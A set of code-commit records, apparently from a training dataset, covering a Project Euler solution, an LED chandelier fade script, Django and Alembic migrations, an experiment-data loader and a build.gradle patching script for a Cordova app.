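# short id are placeholders.
from django.core.management import call_command
call_command('add_owner', 'jdoe', 'abc123def456')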
bf3a54c07deea9285e92339e40ae140d51d1ce67
|
euler032.py
|
euler032.py
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
Add solution for problem 32
|
Add solution for problem 32
This is an optimized solution, with some hints from the Euler forum, after
first solving it with a slow brute-force algorithm using permutations (see 24). BTW, with
some analysis it is possible to reduce the search space
|
Python
|
mit
|
cifvts/PyEuler
|
Add solution for problem 32
This is an optimized solution, with some hints from the Euler forum, after
first solving it with a slow brute-force algorithm using permutations (see 24). BTW, with
some analysis it is possible to reduce the search space
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
<commit_before><commit_msg>Add solution for problem 32
This is an optimized solution, with some hints from the Euler forum, after
first solving it with a slow brute-force algorithm using permutations (see 24). BTW, with
some analysis it is possible to reduce the search space<commit_after>
|
#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
Add solution for problem 32
This is an optimized solution, with some hints from the Euler forum, after
first solving it with a slow brute-force algorithm using permutations (see 24). BTW, with
some analysis it is possible to reduce the search space#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
<commit_before><commit_msg>Add solution for problem 32
This is an optimized solution, with some hints from the Euler forum, after
first solving it with a slow brute-force algorithm using permutations (see 24). BTW, with
some analysis it is possible to reduce the search space<commit_after>#!/usr/bin/python
from functools import reduce
from math import sqrt
pan_set = set()
for i in range(1000, 9999):
for j in range(2, int(sqrt(i)) + 1):
if j * (i // j) == i:
if len(set(str(j) + str(i // j) + str(i)) - set('0')) == 9:
pan_set.add(i)
print(sum(pan_set))
|
|
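The inner loop works because every factor pair (j, i // j) of i has j <= sqrt(i); a Python 3.8+ sketch isolating just that enumeration:
# Python 3.8+ sketch: every factor pair of i surfaces with j <= isqrt(i),
# which is why the search above only scans up to int(sqrt(i)) + 1.
from math import isqrt
def factor_pairs(i):
    return [(j, i // j) for j in range(2, isqrt(i) + 1) if i % j == 0]
print(factor_pairs(7254))  # includes (39, 186): 39 * 186 = 7254, a pandigital identity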
b6a85378d210dc3954a43f25c855ca20f68972b3
|
software/dev/fade_pat.py
|
software/dev/fade_pat.py
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
Add test script for fade pattern
|
Add test script for fade pattern
|
Python
|
mit
|
mayhem/led-chandelier,mayhem/led-chandelier,mayhem/led-chandelier
|
Add test script for fade pattern
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
<commit_before><commit_msg>Add test script for fade pattern<commit_after>
|
#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
Add test script for fade pattern#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
<commit_before><commit_msg>Add test script for fade pattern<commit_after>#!/usr/bin/python
import os
import sys
import math
from colorsys import hsv_to_rgb
from hippietrap.chandelier import Chandelier, BROADCAST, NUM_NODES
from hippietrap.color import Color
from time import sleep, time
from random import random
STEPS = 5000
device = "/dev/serial0"
ch = Chandelier()
ch.open(device)
ch.clear(BROADCAST)
ch.set_color(BROADCAST, Color(0, 0, 0))
print "to red"
ch.send_fade(BROADCAST, 3000, (Color(255, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to green"
ch.send_fade(BROADCAST, 3000, (Color(0, 255, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to blue"
ch.send_fade(BROADCAST, 3000, (Color(0, 0, 255), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
print "to off"
ch.send_fade(BROADCAST, 3000, (Color(10, 0, 0), ))
ch.start_pattern(BROADCAST)
sleep(3)
ch.stop_pattern(BROADCAST)
|
|
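Each color step repeats the same fade/start/sleep/stop sequence; a small helper collapses the repetition, reusing only the imports and calls already exercised above (the 3-second timings mirror the script):
# Sketch: wrap the repeated fade/start/sleep/stop sequence in one helper.
from hippietrap.chandelier import Chandelier, BROADCAST
from hippietrap.color import Color
from time import sleep
def fade_to(ch, color, duration_ms=3000, hold_s=3):
    ch.send_fade(BROADCAST, duration_ms, (color, ))
    ch.start_pattern(BROADCAST)
    sleep(hold_s)
    ch.stop_pattern(BROADCAST)
ch = Chandelier()
ch.open("/dev/serial0")
fade_to(ch, Color(255, 0, 0))  # same effect as the "to red" block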
0c689031a2252a460c3420f99bad14f83eb751d2
|
mla_game/apps/transcript/migrations/0016_auto_20171027_1844.py
|
mla_game/apps/transcript/migrations/0016_auto_20171027_1844.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
Convert un-downvoted considered phrases to upvotes
|
Convert un-downvoted considered phrases to upvotes
|
Python
|
mit
|
WGBH/FixIt,WGBH/FixIt,WGBH/FixIt
|
Convert un-downvoted considered phrases to upvotes
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
<commit_before><commit_msg>Convert un-downvoted considered phrases to upvotes<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
Convert un-downvoted considered phrases to upvotes# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
<commit_before><commit_msg>Convert un-downvoted considered phrases to upvotes<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-27 18:44
from __future__ import unicode_literals
from django.db import migrations
def create_votes(apps, schema_editor):
Profile = apps.get_model(
'accounts', 'Profile'
)
TranscriptPhraseVote = apps.get_model(
'transcript', 'TranscriptPhraseVote'
)
for profile in Profile.objects.all():
phrases = profile.considered_phrases.all()
for phrase in phrases:
if TranscriptPhraseVote.objects.filter(
transcript_phrase=phrase, user=profile.user
).count() == 0:
vote = TranscriptPhraseVote(
transcript_phrase=phrase,
user=profile.user,
upvote=True
)
vote.save()
class Migration(migrations.Migration):
dependencies = [
('transcript', '0015_auto_20171027_1252'),
]
operations = [
migrations.RunPython(create_votes)
]
|
|
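The count()-guarded create keeps the migration idempotent; the same guard is often written with get_or_create, which looks up and inserts in one call (a sketch over the same models loaded via apps.get_model):
# Sketch: the filter().count() guard above expressed with get_or_create;
# upvote=True is applied only when a new row is inserted.
for profile in Profile.objects.all():
    for phrase in profile.considered_phrases.all():
        TranscriptPhraseVote.objects.get_or_create(
            transcript_phrase=phrase,
            user=profile.user,
            defaults={'upvote': True},
        )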
01df9e651fff0d7619dc8bbe5b353ca050b2d966
|
bluebottle/tasks/migrations/0007_auto_20160720_1139.py
|
bluebottle/tasks/migrations/0007_auto_20160720_1139.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
Change description for task types
|
Change description for task types
|
Python
|
bsd-3-clause
|
onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle
|
Change description for task types
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
<commit_before><commit_msg>Change description for task types<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
Change description for task types# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
<commit_before><commit_msg>Change description for task types<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 09:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
|
def303f225777894c2c03fbd0d4f42bbd647a53e
|
analysis/source.py
|
analysis/source.py
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
Add a small starter library for experiment data.
|
Add a small starter library for experiment data.
|
Python
|
mit
|
lmjohns3/cube-experiment,lmjohns3/cube-experiment,lmjohns3/cube-experiment
|
Add a small starter library for experiment data.
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
<commit_before><commit_msg>Add a small starter library for experiment data.<commit_after>
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
Add a small starter library for experiment data.import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
<commit_before><commit_msg>Add a small starter library for experiment data.<commit_after>import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
|
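Because each Trial pairs load() with clear(), a caller can stream through a subject while holding at most one DataFrame in memory; a minimal sketch (the subject path is a placeholder):
# Sketch: iterate every trial, keeping at most one DataFrame loaded,
# using only the load()/clear() methods defined above.
def iter_trials(subject):
    for block in subject.blocks:
        for trial in block.trials:
            trial.load()
            yield trial
            trial.clear()
# for trial in iter_trials(Subject('/path/to/subject')):  # placeholder path
#     print(trial.df.shape)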
01732bcb55cf7cd913bebcdbc6fe883e366870bb
|
bin/gradle_workaround.py
|
bin/gradle_workaround.py
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
Add the gradle_workaround used by the crosswalk plugin
|
Add the gradle_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!
|
Python
|
bsd-3-clause
|
shankari/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,shankari/e-mission-phone,shankari/e-mission-phone,shankari/e-mission-phone
|
Add the gradle_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
<commit_before><commit_msg>Add the gradle_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!<commit_after>
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
Add the gradle_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
<commit_before><commit_msg>Add the gradle_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!<commit_after>import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
|
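With the mutually exclusive flags above, a build wrapper toggles the workaround around the gradle step; an invocation sketch follows (run from the project root so the relative platforms/android/build.gradle path resolves):
# Invocation sketch; paths are relative, so run from the project root.
import subprocess
subprocess.check_call(['python', 'bin/gradle_workaround.py', '--add'])
# ... run the cordova/gradle build here ...
subprocess.check_call(['python', 'bin/gradle_workaround.py', '--remove'])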
a15b0746426cc0560568a462f829e4c4215a0a47
|
migrations/versions/0058.py
|
migrations/versions/0058.py
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
Set all events to show banner text
|
Set all events to show banner text
|
Python
|
mit
|
NewAcropolis/api,NewAcropolis/api,NewAcropolis/api
|
Set all events to show banner text
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
<commit_before><commit_msg>Set all events to show banner text<commit_after>
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
Set all events to show banner text"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
<commit_before><commit_msg>Set all events to show banner text<commit_after>"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
